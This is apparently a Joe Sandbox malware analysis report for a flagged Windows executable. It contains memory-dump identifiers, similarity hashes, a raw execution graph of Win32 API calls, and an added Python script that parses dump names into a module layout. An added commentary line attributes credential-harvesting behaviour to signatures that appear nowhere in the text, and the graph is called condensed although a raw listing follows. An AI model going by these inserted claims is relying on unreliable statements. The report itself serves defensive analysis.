• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction ID: ff432e68e2524181438430a90ae6f6fad9f07540786ada7cf2f339e97a492e80
• Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction Fuzzy Hash: 58114C32609B8182EB229F29E40025AB7E4FB99B88F584234DB8D47768EF7CD551CB00

Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction ID: e24e7482a3a2e25d9e60ee98e9af8bb884b4093bc9117a16fcb0c71b8b16062f
• Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction Fuzzy Hash: D601882591D20285FB26BF68946627FA3A0EF66784FC00439D74D4A699FFACD504CB24
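The function blocks above all point at the same handful of memory dumps, and the only thing that distinguishes the dump you want to load into IDA from the others is the address and protection encoded in the .sdmp name. The Python below is an added example, not part of the Joe Sandbox report: it reconstructs the mapped module layout from one Memory Dump Source block (copied from this listing, "Download File" link text and all), sorts the regions by address, flags the executable one, and checks that every associated region lies at or above the Offset: the report gives as the module base. It assumes the field order of the .sdmp name and that the fifth dot-separated field is the Win32 PAGE_* protection value; the page does not document that format, but the values seen here (0x20 on the code page at ...61000, 0x02 on the PE header at the base, 0x04 on the two writable data pages) are consistent with it, so treat the field names as an assumption.

```python
"""Reconstruct the in-memory module layout from Joe Sandbox .sdmp identifiers.

Assumption (not documented on the report page): a dump name has the form
    <process idx>.<stage>.<dump id>.<base address>.<protection>.<state>.<type>.<seq>.sdmp
and <protection> holds the Win32 PAGE_* constant.  The values on this page are
consistent with that reading, but the field names are ours, not Joe Sandbox's.
"""
import re

# Win32 page protection constants (winnt.h).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.sdmp"
)

# Constructed input: one Memory Dump Source block exactly as it appears in the
# listing above, including the "Download File" text the page extraction glued on.
SAMPLE_BLOCK = """\
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
"""


def parse_dump_name(name):
    """Split one .sdmp identifier into its fields; raise if the line holds none."""
    m = SDMP_RE.search(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    prot = int(m["prot"], 16)
    return {
        "dump_id": int(m["dump_id"]),
        "base": int(m["base"], 16),
        "protection": prot,
        "protection_name": PAGE_PROTECTIONS.get(prot & 0xFF, f"0x{prot:x}"),
        # Any of PAGE_EXECUTE* (0x10..0x80) means the page can run code.
        "executable": bool(prot & 0xF0),
    }


def build_layout(block):
    """Return (module_base, regions) for a Memory Dump Source block.

    module_base comes from the 'Offset:' field; regions are sorted by address so
    the caller can check that each one lies inside the mapped PE image.
    """
    regions = []
    module_base = None
    for line in block.splitlines():
        if "Offset:" in line:
            module_base = int(re.search(r"Offset:\s*([0-9A-Fa-f]+)", line)[1], 16)
        if ".sdmp" in line:
            regions.append(parse_dump_name(line))
    regions.sort(key=lambda r: r["base"])
    return module_base, regions


def executable_regions(regions):
    """The dumps worth loading into a disassembler: pages with an EXECUTE bit set."""
    return [r for r in regions if r["executable"]]


def format_layout(module_base, regions):
    """One line per region: RVA from the module base, VA, and protection name."""
    lines = [f"module base 0x{module_base:016x}"]
    for r in regions:
        rva = r["base"] - module_base
        lines.append(f"  +0x{rva:06x}  0x{r['base']:016x}  {r['protection_name']}")
    return "\n".join(lines)


if __name__ == "__main__":
    base, regs = build_layout(SAMPLE_BLOCK)
    print(format_layout(base, regs))
    print("executable:", [hex(r["base"]) for r in executable_regions(regs)])
    assert all(r["base"] >= base for r in regs), "region below module base"
```

On this block the only executable region is the page at 0x7FF7B2B61000 (RVA 0x1000), which is why every function listing names that dump as its Source File while the header, read-only and writable pages appear only as Associated.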

                                                                                                                                                                                                                                    Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.2%
Total number of Nodes: 664
Total number of Limit Nodes: 10

execution_graph (rendered as an interactive node graph on the original page; the raw node and edge listing is condensed here to the functions and Windows API calls it names, keyed by the addresses the graph uses):
• Root 7ff7b2b6cc3c: CRT start-up (__scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_dllmain_crt_thread_attach, __CxxCallCatchBlock), GetStartupInfoW at 7ff7b2b6d28b, GetModuleHandleW at 7ff7b2b6d2b8, 7ff7b2b79b2c (45 API calls), then entry into 7ff7b2b61000.
• 7ff7b2b61000: calls 7ff7b2b75484 (7ff7b2b7f358, 71 API calls, _fread_nolock; 7ff7b2b7a814, 37 API calls) and reaches 7ff7b2b637fb, which calls 7ff7b2b636b0: GetLastError at 7ff7b2b636eb, FindFirstFileExW at 7ff7b2b69280, CreateFileW / GetFinalPathNameByHandleW / CloseHandle at 7ff7b2b69300, WideCharToMultiByte at 7ff7b2b69440, __vcrt_InitializeCriticalSectionEx at 7ff7b2b6374c.
• 7ff7b2b61950 (115 API calls): 7ff7b2b645c0 (108 API calls), 7ff7b2b67f90 (83 API calls), then repeated 7ff7b2b706d4 / 7ff7b2b7039c (_fread_nolock) / 7ff7b2b70110 sequences with 7ff7b2b74f08 (_get_daylight) and 7ff7b2b62910 on the error paths, and 7ff7b2b7004c (74 API calls).
• 7ff7b2b68830 (14 API calls): GetEnvironmentVariableW at 7ff7b2b68859, ExpandEnvironmentStringsW at 7ff7b2b68876, WideCharToMultiByte at 7ff7b2b69440.
• 7ff7b2b69390: MultiByteToWideChar at 7ff7b2b693b2 and 7ff7b2b693f3.
• 7ff7b2b63da7: SetDllDirectoryW, LoadLibraryExW; 7ff7b2b63dd7: SetDllDirectoryW; 7ff7b2b66fc0 and 7ff7b2b68e60: FreeLibrary; 7ff7b2b690c0: LocalFree.
• 7ff7b2b64012: PostMessageW, GetMessageW; 7ff7b2b63360 via 7ff7b2b66360, 7ff7b2b66050 and 7ff7b2b661e0 (54 API calls).
• Collapsed nodes (API call counts as labelled on the graph): 7ff7b2b671b0 (125), 7ff7b2b633c0 (121), 7ff7b2b66e00 (120), 7ff7b2b67340 (117), 7ff7b2b68660 (86), 7ff7b2b690e0 (59), 7ff7b2b674f0 (55), 7ff7b2b62710 / 7ff7b2b62a50 / 7ff7b2b66dc0 / 7ff7b2b62910 (54 each, _log10_special or _get_daylight), 7ff7b2b62c50 (51), 7ff7b2b644e0 / 7ff7b2b62810 / 7ff7b2b61c80 (49 each), 7ff7b2b689a0 / 7ff7b2b68940 (40 each, __std_exception_destroy), 7ff7b2b6c550 (8), 7ff7b2b6d12c / 7ff7b2b6cf90 / 7ff7b2b6d888 (7 each).

Read the graph with the coverage line in mind: 1.6% execution coverage means it shows only the start-up, file-reading and library-loading path the sandbox actually drove, not the credential-harvesting behaviour the signatures above attribute to the sample.
77630 7ff7b2b66fc0 FreeLibrary 77565->77630 77568 7ff7b2b61ca5 77567->77568 77911 7ff7b2b74984 77568->77911 77571->77338 77573 7ff7b2b645cc 77572->77573 77574 7ff7b2b69390 2 API calls 77573->77574 77575 7ff7b2b645f4 77574->77575 77576 7ff7b2b69390 2 API calls 77575->77576 77577 7ff7b2b64607 77576->77577 77938 7ff7b2b75f94 77577->77938 77580 7ff7b2b6c550 _log10_special 8 API calls 77581 7ff7b2b6392b 77580->77581 77581->77327 77582 7ff7b2b67f90 77581->77582 77583 7ff7b2b67fb4 77582->77583 77584 7ff7b2b706d4 73 API calls 77583->77584 77589 7ff7b2b6808b __std_exception_destroy 77583->77589 77585 7ff7b2b67fd0 77584->77585 77585->77589 78106 7ff7b2b778c8 77585->78106 77587 7ff7b2b706d4 73 API calls 77590 7ff7b2b67fe5 77587->77590 77588 7ff7b2b7039c _fread_nolock 53 API calls 77588->77590 77589->77331 77590->77587 77590->77588 77590->77589 77592 7ff7b2b7007c 77591->77592 78122 7ff7b2b6fe28 77592->78122 77594 7ff7b2b70095 77594->77327 77595->77394 77596->77394 77597->77341 77598->77345 77599->77349 77600->77352 77601->77363 77602->77394 77603->77370 77604->77394 77606 7ff7b2b6c559 77605->77606 77607 7ff7b2b63ca7 77606->77607 77608 7ff7b2b6c8e0 IsProcessorFeaturePresent 77606->77608 77607->77450 77609 7ff7b2b6c8f8 77608->77609 78134 7ff7b2b6cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77609->78134 77611 7ff7b2b6c90b 78135 7ff7b2b6c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 77611->78135 77614->77383 77615->77394 77616->77369 77618 7ff7b2b61c80 49 API calls 77617->77618 77619 7ff7b2b64660 77618->77619 77619->77388 77620->77422 77621->77425 77622->77428 77623->77433 77624->77440 77625->77432 77626->77437 77627->77437 77628->77402 77630->77419 77631->77463 77632->77463 77634 7ff7b2b636bc GetModuleFileNameW 77633->77634 77634->77467 77634->77468 77636 7ff7b2b692d2 77635->77636 77637 7ff7b2b692bf FindClose 77635->77637 77638 7ff7b2b6c550 _log10_special 8 API calls 77636->77638 77637->77636 77639 7ff7b2b6371a 
77638->77639 77639->77472 77639->77473 77640->77485 77641->77479 77642->77484 77643->77477 77644->77485 77646 7ff7b2b70704 77645->77646 77664 7ff7b2b70464 77646->77664 77648 7ff7b2b7071d 77648->77496 77677 7ff7b2b703bc 77649->77677 77652->77502 77653->77535 77654->77507 77655->77535 77656->77514 77657->77535 77658->77525 77659->77535 77660->77531 77661->77535 77662->77532 77663->77535 77665 7ff7b2b704ce 77664->77665 77666 7ff7b2b7048e 77664->77666 77665->77666 77667 7ff7b2b704da 77665->77667 77676 7ff7b2b7a814 37 API calls 2 library calls 77666->77676 77675 7ff7b2b7546c EnterCriticalSection 77667->77675 77669 7ff7b2b704b5 77669->77648 77671 7ff7b2b704df 77672 7ff7b2b705e8 71 API calls 77671->77672 77673 7ff7b2b704f1 77672->77673 77674 7ff7b2b75478 _fread_nolock LeaveCriticalSection 77673->77674 77674->77669 77676->77669 77678 7ff7b2b703e6 77677->77678 77689 7ff7b2b61a20 77677->77689 77679 7ff7b2b703f5 __scrt_get_show_window_mode 77678->77679 77680 7ff7b2b70432 77678->77680 77678->77689 77691 7ff7b2b74f08 11 API calls _get_daylight 77679->77691 77690 7ff7b2b7546c EnterCriticalSection 77680->77690 77683 7ff7b2b7043a 77685 7ff7b2b7013c _fread_nolock 51 API calls 77683->77685 77684 7ff7b2b7040a 77692 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 77684->77692 77687 7ff7b2b70451 77685->77687 77688 7ff7b2b75478 _fread_nolock LeaveCriticalSection 77687->77688 77688->77689 77689->77504 77689->77505 77691->77684 77692->77689 77693->77546 77695 7ff7b2b66375 77694->77695 77696 7ff7b2b61c80 49 API calls 77695->77696 77697 7ff7b2b663b1 77696->77697 77698 7ff7b2b663dd 77697->77698 77699 7ff7b2b663ba 77697->77699 77701 7ff7b2b64630 49 API calls 77698->77701 77782 7ff7b2b62710 54 API calls _log10_special 77699->77782 77702 7ff7b2b663f5 77701->77702 77703 7ff7b2b66413 77702->77703 77783 7ff7b2b62710 54 API calls _log10_special 77702->77783 77772 7ff7b2b64560 77703->77772 77706 7ff7b2b6c550 _log10_special 8 API calls 77707 7ff7b2b6336e 77706->77707 77707->77562 77725 
7ff7b2b66500 77707->77725 77709 7ff7b2b6642b 77711 7ff7b2b64630 49 API calls 77709->77711 77710 7ff7b2b68e80 3 API calls 77710->77709 77712 7ff7b2b66444 77711->77712 77713 7ff7b2b66469 77712->77713 77714 7ff7b2b66449 77712->77714 77778 7ff7b2b68e80 77713->77778 77784 7ff7b2b62710 54 API calls _log10_special 77714->77784 77717 7ff7b2b66476 77718 7ff7b2b66482 77717->77718 77719 7ff7b2b664c1 77717->77719 77720 7ff7b2b69390 2 API calls 77718->77720 77786 7ff7b2b65830 137 API calls 77719->77786 77722 7ff7b2b6649a GetLastError 77720->77722 77785 7ff7b2b62c50 51 API calls _log10_special 77722->77785 77724 7ff7b2b663d3 77724->77706 77787 7ff7b2b65400 77725->77787 77727 7ff7b2b66526 77728 7ff7b2b6652e 77727->77728 77729 7ff7b2b6653f 77727->77729 77812 7ff7b2b62710 54 API calls _log10_special 77728->77812 77794 7ff7b2b64c90 77729->77794 77733 7ff7b2b6655c 77737 7ff7b2b6656c 77733->77737 77739 7ff7b2b6657d 77733->77739 77734 7ff7b2b6654b 77813 7ff7b2b62710 54 API calls _log10_special 77734->77813 77736 7ff7b2b6653a 77736->77558 77814 7ff7b2b62710 54 API calls _log10_special 77737->77814 77740 7ff7b2b6659c 77739->77740 77741 7ff7b2b665ad 77739->77741 77815 7ff7b2b62710 54 API calls _log10_special 77740->77815 77743 7ff7b2b665bc 77741->77743 77744 7ff7b2b665cd 77741->77744 77816 7ff7b2b62710 54 API calls _log10_special 77743->77816 77798 7ff7b2b64d50 77744->77798 77748 7ff7b2b665dc 77817 7ff7b2b62710 54 API calls _log10_special 77748->77817 77749 7ff7b2b665ed 77751 7ff7b2b665fc 77749->77751 77752 7ff7b2b6660d 77749->77752 77818 7ff7b2b62710 54 API calls _log10_special 77751->77818 77754 7ff7b2b6661f 77752->77754 77757 7ff7b2b66630 77752->77757 77819 7ff7b2b62710 54 API calls _log10_special 77754->77819 77756 7ff7b2b6665a 77756->77736 77822 7ff7b2b62710 54 API calls _log10_special 77756->77822 77757->77756 77820 7ff7b2b772b0 73 API calls 77757->77820 77759 7ff7b2b66648 77821 7ff7b2b772b0 73 API calls 77759->77821 77763 7ff7b2b66070 77762->77763 77763->77763 77764 7ff7b2b66099 
77763->77764 77770 7ff7b2b660b0 __std_exception_destroy 77763->77770 77854 7ff7b2b62710 54 API calls _log10_special 77764->77854 77766 7ff7b2b660a5 77766->77560 77767 7ff7b2b661bb 77767->77560 77769 7ff7b2b62710 54 API calls 77769->77770 77770->77767 77770->77769 77824 7ff7b2b61470 77770->77824 77771->77562 77773 7ff7b2b6456a 77772->77773 77774 7ff7b2b69390 2 API calls 77773->77774 77775 7ff7b2b6458f 77774->77775 77776 7ff7b2b6c550 _log10_special 8 API calls 77775->77776 77777 7ff7b2b645b7 77776->77777 77777->77709 77777->77710 77779 7ff7b2b69390 2 API calls 77778->77779 77780 7ff7b2b68e94 LoadLibraryExW 77779->77780 77781 7ff7b2b68eb3 __std_exception_destroy 77780->77781 77781->77717 77782->77724 77783->77703 77784->77724 77785->77724 77786->77724 77789 7ff7b2b6542c 77787->77789 77788 7ff7b2b65434 77788->77727 77789->77788 77792 7ff7b2b655d4 77789->77792 77823 7ff7b2b76aa4 48 API calls 77789->77823 77790 7ff7b2b65797 __std_exception_destroy 77790->77727 77791 7ff7b2b647d0 47 API calls 77791->77792 77792->77790 77792->77791 77795 7ff7b2b64cc0 77794->77795 77796 7ff7b2b6c550 _log10_special 8 API calls 77795->77796 77797 7ff7b2b64d2a 77796->77797 77797->77733 77797->77734 77799 7ff7b2b64d65 77798->77799 77800 7ff7b2b61c80 49 API calls 77799->77800 77801 7ff7b2b64db1 77800->77801 77802 7ff7b2b61c80 49 API calls 77801->77802 77811 7ff7b2b64e33 __std_exception_destroy 77801->77811 77803 7ff7b2b64df0 77802->77803 77806 7ff7b2b69390 2 API calls 77803->77806 77803->77811 77804 7ff7b2b6c550 _log10_special 8 API calls 77805 7ff7b2b64e7e 77804->77805 77805->77748 77805->77749 77807 7ff7b2b64e06 77806->77807 77808 7ff7b2b69390 2 API calls 77807->77808 77809 7ff7b2b64e1d 77808->77809 77810 7ff7b2b69390 2 API calls 77809->77810 77810->77811 77811->77804 77812->77736 77813->77736 77814->77736 77815->77736 77816->77736 77817->77736 77818->77736 77819->77736 77820->77759 77821->77756 77822->77736 77823->77789 77825 7ff7b2b645c0 108 API calls 77824->77825 77826 7ff7b2b61493 
77825->77826 77827 7ff7b2b614bc 77826->77827 77828 7ff7b2b6149b 77826->77828 77830 7ff7b2b706d4 73 API calls 77827->77830 77877 7ff7b2b62710 54 API calls _log10_special 77828->77877 77832 7ff7b2b614d1 77830->77832 77831 7ff7b2b614ab 77831->77770 77833 7ff7b2b614f8 77832->77833 77834 7ff7b2b614d5 77832->77834 77837 7ff7b2b61508 77833->77837 77838 7ff7b2b61532 77833->77838 77878 7ff7b2b74f08 11 API calls _get_daylight 77834->77878 77836 7ff7b2b614da 77879 7ff7b2b62910 54 API calls _log10_special 77836->77879 77880 7ff7b2b74f08 11 API calls _get_daylight 77837->77880 77841 7ff7b2b61538 77838->77841 77849 7ff7b2b6154b 77838->77849 77855 7ff7b2b61210 77841->77855 77842 7ff7b2b61510 77881 7ff7b2b62910 54 API calls _log10_special 77842->77881 77845 7ff7b2b7004c 74 API calls 77848 7ff7b2b615c4 77845->77848 77846 7ff7b2b614f3 __std_exception_destroy 77846->77845 77847 7ff7b2b7039c _fread_nolock 53 API calls 77847->77849 77848->77770 77849->77846 77849->77847 77850 7ff7b2b615d6 77849->77850 77882 7ff7b2b74f08 11 API calls _get_daylight 77850->77882 77852 7ff7b2b615db 77883 7ff7b2b62910 54 API calls _log10_special 77852->77883 77854->77766 77856 7ff7b2b61268 77855->77856 77857 7ff7b2b61297 77856->77857 77858 7ff7b2b6126f 77856->77858 77861 7ff7b2b612d4 77857->77861 77862 7ff7b2b612b1 77857->77862 77888 7ff7b2b62710 54 API calls _log10_special 77858->77888 77860 7ff7b2b61282 77860->77846 77866 7ff7b2b612e6 77861->77866 77875 7ff7b2b61309 memcpy_s 77861->77875 77889 7ff7b2b74f08 11 API calls _get_daylight 77862->77889 77864 7ff7b2b612b6 77890 7ff7b2b62910 54 API calls _log10_special 77864->77890 77891 7ff7b2b74f08 11 API calls _get_daylight 77866->77891 77868 7ff7b2b7039c _fread_nolock 53 API calls 77868->77875 77869 7ff7b2b612eb 77892 7ff7b2b62910 54 API calls _log10_special 77869->77892 77871 7ff7b2b612cf __std_exception_destroy 77871->77846 77872 7ff7b2b613cf 77893 7ff7b2b62710 54 API calls _log10_special 77872->77893 77875->77868 77875->77871 77875->77872 77876 7ff7b2b70110 
37 API calls 77875->77876 77884 7ff7b2b70adc 77875->77884 77876->77875 77877->77831 77878->77836 77879->77846 77880->77842 77881->77846 77882->77852 77883->77846 77885 7ff7b2b70b0c 77884->77885 77894 7ff7b2b7082c 77885->77894 77887 7ff7b2b70b2a 77887->77875 77888->77860 77889->77864 77890->77871 77891->77869 77892->77871 77893->77871 77895 7ff7b2b7084c 77894->77895 77900 7ff7b2b70879 77894->77900 77896 7ff7b2b70856 77895->77896 77897 7ff7b2b70881 77895->77897 77895->77900 77908 7ff7b2b7a814 37 API calls 2 library calls 77896->77908 77901 7ff7b2b7076c 77897->77901 77900->77887 77909 7ff7b2b7546c EnterCriticalSection 77901->77909 77903 7ff7b2b70789 77904 7ff7b2b707ac 74 API calls 77903->77904 77905 7ff7b2b70792 77904->77905 77906 7ff7b2b75478 _fread_nolock LeaveCriticalSection 77905->77906 77907 7ff7b2b7079d 77906->77907 77907->77900 77908->77900 77910->77565 77912 7ff7b2b749de 77911->77912 77913 7ff7b2b74a03 77912->77913 77915 7ff7b2b74a3f 77912->77915 77929 7ff7b2b7a814 37 API calls 2 library calls 77913->77929 77930 7ff7b2b72c10 49 API calls _invalid_parameter_noinfo 77915->77930 77917 7ff7b2b74b1c 77920 7ff7b2b7a948 __free_lconv_num 11 API calls 77917->77920 77918 7ff7b2b74a2d 77919 7ff7b2b6c550 _log10_special 8 API calls 77918->77919 77921 7ff7b2b61cc8 77919->77921 77920->77918 77921->77325 77922 7ff7b2b74ad6 77922->77917 77923 7ff7b2b74af1 77922->77923 77924 7ff7b2b74b40 77922->77924 77927 7ff7b2b74ae8 77922->77927 77931 7ff7b2b7a948 77923->77931 77924->77917 77925 7ff7b2b74b4a 77924->77925 77928 7ff7b2b7a948 __free_lconv_num 11 API calls 77925->77928 77927->77917 77927->77923 77928->77918 77929->77918 77930->77922 77932 7ff7b2b7a94d RtlFreeHeap 77931->77932 77936 7ff7b2b7a97c 77931->77936 77933 7ff7b2b7a968 GetLastError 77932->77933 77932->77936 77934 7ff7b2b7a975 __free_lconv_num 77933->77934 77937 7ff7b2b74f08 11 API calls _get_daylight 77934->77937 77936->77918 77937->77936 77939 7ff7b2b75ec8 77938->77939 77940 7ff7b2b75eee 77939->77940 77943 7ff7b2b75f21 
77939->77943 77969 7ff7b2b74f08 11 API calls _get_daylight 77940->77969 77942 7ff7b2b75ef3 77970 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 77942->77970 77944 7ff7b2b75f27 77943->77944 77945 7ff7b2b75f34 77943->77945 77971 7ff7b2b74f08 11 API calls _get_daylight 77944->77971 77957 7ff7b2b7ac28 77945->77957 77949 7ff7b2b64616 77949->77580 77951 7ff7b2b75f48 77972 7ff7b2b74f08 11 API calls _get_daylight 77951->77972 77952 7ff7b2b75f55 77964 7ff7b2b7fecc 77952->77964 77955 7ff7b2b75f68 77973 7ff7b2b75478 LeaveCriticalSection 77955->77973 77974 7ff7b2b802d8 EnterCriticalSection 77957->77974 77959 7ff7b2b7ac3f 77960 7ff7b2b7ac9c 19 API calls 77959->77960 77961 7ff7b2b7ac4a 77960->77961 77962 7ff7b2b80338 _isindst LeaveCriticalSection 77961->77962 77963 7ff7b2b75f3e 77962->77963 77963->77951 77963->77952 77975 7ff7b2b7fbc8 77964->77975 77967 7ff7b2b7ff26 77967->77955 77969->77942 77970->77949 77971->77949 77972->77949 77980 7ff7b2b7fc03 __vcrt_InitializeCriticalSectionEx 77975->77980 77977 7ff7b2b7fea1 77994 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 77977->77994 77979 7ff7b2b7fdd3 77979->77967 77987 7ff7b2b86d54 77979->77987 77984 7ff7b2b7fdca 77980->77984 77990 7ff7b2b77a3c 51 API calls 3 library calls 77980->77990 77982 7ff7b2b7fe35 77982->77984 77991 7ff7b2b77a3c 51 API calls 3 library calls 77982->77991 77984->77979 77993 7ff7b2b74f08 11 API calls _get_daylight 77984->77993 77985 7ff7b2b7fe54 77985->77984 77992 7ff7b2b77a3c 51 API calls 3 library calls 77985->77992 77995 7ff7b2b86354 77987->77995 77990->77982 77991->77985 77992->77984 77993->77977 77994->77979 77996 7ff7b2b8636b 77995->77996 77997 7ff7b2b86389 77995->77997 78049 7ff7b2b74f08 11 API calls _get_daylight 77996->78049 77997->77996 77999 7ff7b2b863a5 77997->77999 78006 7ff7b2b86964 77999->78006 78000 7ff7b2b86370 78050 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78000->78050 78004 7ff7b2b8637c 78004->77967 78052 7ff7b2b86698 78006->78052 78009 7ff7b2b869d9 78084 7ff7b2b74ee8 11 
API calls _get_daylight 78009->78084 78010 7ff7b2b869f1 78072 7ff7b2b78520 78010->78072 78021 7ff7b2b863d0 78021->78004 78051 7ff7b2b784f8 LeaveCriticalSection 78021->78051 78029 7ff7b2b869de 78085 7ff7b2b74f08 11 API calls _get_daylight 78029->78085 78049->78000 78050->78004 78053 7ff7b2b866c4 78052->78053 78054 7ff7b2b866de 78052->78054 78053->78054 78097 7ff7b2b74f08 11 API calls _get_daylight 78053->78097 78058 7ff7b2b8675c 78054->78058 78099 7ff7b2b74f08 11 API calls _get_daylight 78054->78099 78056 7ff7b2b866d3 78098 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78056->78098 78059 7ff7b2b867ad 78058->78059 78101 7ff7b2b74f08 11 API calls _get_daylight 78058->78101 78069 7ff7b2b8680a 78059->78069 78103 7ff7b2b79b78 37 API calls 2 library calls 78059->78103 78062 7ff7b2b86806 78065 7ff7b2b86888 78062->78065 78062->78069 78064 7ff7b2b867a2 78102 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78064->78102 78104 7ff7b2b7a900 17 API calls _isindst 78065->78104 78066 7ff7b2b86751 78100 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78066->78100 78069->78009 78069->78010 78105 7ff7b2b802d8 EnterCriticalSection 78072->78105 78084->78029 78085->78021 78097->78056 78098->78054 78099->78066 78100->78058 78101->78064 78102->78059 78103->78062 78107 7ff7b2b778f8 78106->78107 78110 7ff7b2b773d4 78107->78110 78109 7ff7b2b77911 78109->77590 78111 7ff7b2b7741e 78110->78111 78112 7ff7b2b773ef 78110->78112 78120 7ff7b2b7546c EnterCriticalSection 78111->78120 78121 7ff7b2b7a814 37 API calls 2 library calls 78112->78121 78115 7ff7b2b77423 78117 7ff7b2b77440 38 API calls 78115->78117 78116 7ff7b2b7740f 78116->78109 78118 7ff7b2b7742f 78117->78118 78119 7ff7b2b75478 _fread_nolock LeaveCriticalSection 78118->78119 78119->78116 78121->78116 78123 7ff7b2b6fe43 78122->78123 78124 7ff7b2b6fe71 78122->78124 78133 7ff7b2b7a814 37 API calls 2 library calls 78123->78133 78125 7ff7b2b6fe63 78124->78125 78132 7ff7b2b7546c EnterCriticalSection 78124->78132 78125->77594 78128 
7ff7b2b6fe88 78129 7ff7b2b6fea4 72 API calls 78128->78129 78130 7ff7b2b6fe94 78129->78130 78131 7ff7b2b75478 _fread_nolock LeaveCriticalSection 78130->78131 78131->78125 78133->78125 78134->77611 78136 7ffd94064460 78137 7ffd94065056 78136->78137 78140 7ffd94064478 78136->78140 78138 7ffd94064f63 LoadLibraryA 78139 7ffd94064f7d 78138->78139 78139->78140 78143 7ffd94064f9c GetProcAddress 78139->78143 78140->78138 78142 7ffd94064fbe VirtualProtect VirtualProtect 78140->78142 78142->78137 78143->78139 78144 7ffd94064fb3 78143->78144 78145 7ff7b2b75628 78146 7ff7b2b75642 78145->78146 78147 7ff7b2b7565f 78145->78147 78170 7ff7b2b74ee8 11 API calls _get_daylight 78146->78170 78147->78146 78148 7ff7b2b75672 CreateFileW 78147->78148 78150 7ff7b2b756dc 78148->78150 78151 7ff7b2b756a6 78148->78151 78174 7ff7b2b75c04 46 API calls 3 library calls 78150->78174 78173 7ff7b2b7577c 59 API calls 3 library calls 78151->78173 78152 7ff7b2b75647 78171 7ff7b2b74f08 11 API calls _get_daylight 78152->78171 78156 7ff7b2b756b4 78159 7ff7b2b756bb CloseHandle 78156->78159 78160 7ff7b2b756d1 CloseHandle 78156->78160 78157 7ff7b2b756e1 78161 7ff7b2b756e5 78157->78161 78162 7ff7b2b75710 78157->78162 78158 7ff7b2b7564f 78172 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78158->78172 78164 7ff7b2b7565a 78159->78164 78160->78164 78175 7ff7b2b74e7c 11 API calls 2 library calls 78161->78175 78176 7ff7b2b759c4 51 API calls 78162->78176 78167 7ff7b2b7571d 78177 7ff7b2b75b00 21 API calls _fread_nolock 78167->78177 78169 7ff7b2b756ef 78169->78164 78170->78152 78171->78158 78172->78164 78173->78156 78174->78157 78175->78169 78176->78167 